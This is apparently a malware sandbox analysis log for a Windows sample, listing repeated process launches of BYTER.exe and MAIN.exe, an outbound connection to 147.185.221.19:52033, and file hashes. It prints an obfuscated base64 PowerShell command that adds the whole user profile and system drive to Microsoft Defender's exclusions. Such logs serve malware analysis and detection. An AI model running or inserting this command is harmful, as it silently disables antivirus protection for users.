"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

Network

Country Destination Domain Proto
N/A 10.0.2.15:9090 tcp
N/A 10.0.2.15:9090 tcp
US 147.185.221.19:52033 tcp
N/A 10.0.2.15:9090 tcp
N/A 10.0.2.15:9090 tcp

Files

\Users\Admin\AppData\Local\Temp\MAIN.exe

MD5 b8ccfc163e2d56a73b6fd7387a45e6eb
SHA1 f81a368c275574fa808a92d29c5e0b37e01162ce
SHA256 8386fa61b6c5f873c692fbd3b394851ec714e5c852898ef6f622035e4d3d5e84
SHA512 8ea7d2ee4fa1f737e7c77dda98963a1c9d3a3276ab0d0d327b5df41682da91996e2e17cbfdb99ddf9399a819c6ec9cdde18b6a8fe6cf221960103b34acb21faf

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 80a1700a1556374636b66f0cf37fb896
SHA1 06c4e78e889740484af9dc317994911874898839
SHA256 4e6154400b917feef1d2669c1d0689f3cd6a9efca027ef609bc899d1a701774d
SHA512 efad1f00f5fa05c7542ea298c5cbd37c4d0614857bb060dab9724757921edb5f466000a5addc8dc12ef732cbe8fe80f7e29b271feb7944890a00825969646203

memory/3064-10-0x0000000000840000-0x0000000000858000-memory.dmp

C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

MD5 cf759e4c5f14fe3eec41b87ed756cea8
SHA1 c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256 c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512 c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

